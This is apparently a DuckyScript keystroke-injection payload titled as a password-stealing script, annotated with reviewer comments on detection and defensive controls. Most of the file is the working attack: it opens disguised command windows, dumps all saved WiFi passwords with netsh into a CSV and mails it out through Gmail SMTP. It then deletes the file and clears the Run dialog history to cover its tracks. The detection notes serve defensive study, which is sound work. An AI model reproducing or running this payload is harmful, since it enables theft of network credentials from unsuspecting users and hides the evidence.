Created
April 17, 2018 04:52
REM Password Stealing script by TylerTechNZ | |
REM | |
REM Review summary: keystroke-injection payload typed into a Windows session through the Run dialog.
REM It runs three stages as the logged-on user:
REM   1. read the saved WiFi profiles and their keys with netsh and write them to temp.csv,
REM   2. send temp.csv as a mail attachment through smtp.gmail.com on port 587,
REM   3. delete temp.csv and remove the Run dialog history values (RunMRU).
REM Defensive controls that apply to what is shown here: USB/HID device control on endpoints,
REM process command-line auditing, PowerShell script block logging, and egress filtering of
REM outbound SMTP submission from workstations.
REM --> Create Obfuscated CMD | |
REM MODE 20,1 shrinks the console to 20 columns by 1 line and COLOR FE sets light yellow text on a
REM bright white background, so the typed commands are hard to read on screen. The window is still
REM created: a cmd.exe started from the Run dialog followed by these two commands is itself a signal.
DELAY 2000 | |
WINDOWS r | |
DELAY 200 | |
STRING cmd | |
ENTER | |
DELAY 200 | |
STRING MODE 20,1 | |
ENTER | |
DELAY 200 | |
STRING COLOR FE | |
ENTER | |
REM --> Start Powershell, get all WiFi passwords and Export to CSV | |
REM The pipeline lists profiles with "netsh wlan show profiles", re-queries each one with
REM "key=clear", extracts the "Key Content" value and exports PROFILE_NAME/PASSWORD rows to temp.csv.
REM temp.csv is a relative path, so it lands in the console's current directory
REM (presumably the user's profile folder for a cmd started from the Run dialog; confirm on the host).
REM Detection: powershell.exe with -W Hidden and -Exec Bypass spawning netsh.exe with "key=clear"
REM is visible in process-creation logs (Security 4688 with command line, Sysmon event 1) and the
REM full pipeline text appears in PowerShell script block logging (event 4104) when enabled.
REM Execution policy does not apply to an inline command string, so it is not a control to rely on here.
DELAY 200 | |
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv" | |
ENTER | |
REM --> Wait a couple of seconds and start a new Obfuscated CMD | |
DELAY 3000 | |
WINDOWS r | |
DELAY 200 | |
STRING cmd | |
ENTER | |
DELAY 200 | |
STRING MODE 20,1 | |
ENTER | |
DELAY 200 | |
STRING COLOR FE | |
ENTER | |
DELAY 200 | |
REM --> Email CSV via GMAIL | |
REM Uses Net.Mail.SmtpClient with EnableSsl against smtp.gmail.com:587, so the message body and
REM attachment are encrypted in transit; network detection has to key on metadata, i.e.
REM powershell.exe on a workstation opening a connection to TCP 587.
REM SENDEREMAIL, SENDERPASSWORD and RECIEVEREMAIL are placeholders in this listing. Whatever values
REM replace them are passed on the powershell.exe command line in clear text, so command-line and
REM script block logs from an affected host record the mail account involved.
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDEREMAIL', 'SENDERPASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDEREMAIL'; $ReportEmail.To.Add('RECIEVEREMAIL'); $ReportEmail.Subject = 'Wifi Report'; $ReportEmail.Body = 'Attached is your wifi report.'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail)" | |
ENTER | |
REM --> Then cover your tracks. You were never here. | |
REM The cleanup shown is limited to two things: "del temp.csv" and removal of every value under the
REM HKCU ...\Explorer\RunMRU key (the Run dialog's history), with errors suppressed.
REM For responders: nothing here touches process-creation, PowerShell or network logs, and an
REM emptied RunMRU key on an otherwise used profile is an indicator in its own right.
REM A plain "del" does not overwrite data, so the CSV content may still be recoverable from disk.
DELAY 500 | |
STRING del temp.csv | |
ENTER | |
DELAY 500 | |
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" | |
ENTER | |
DELAY 500 | |
STRING exit | |
ENTER |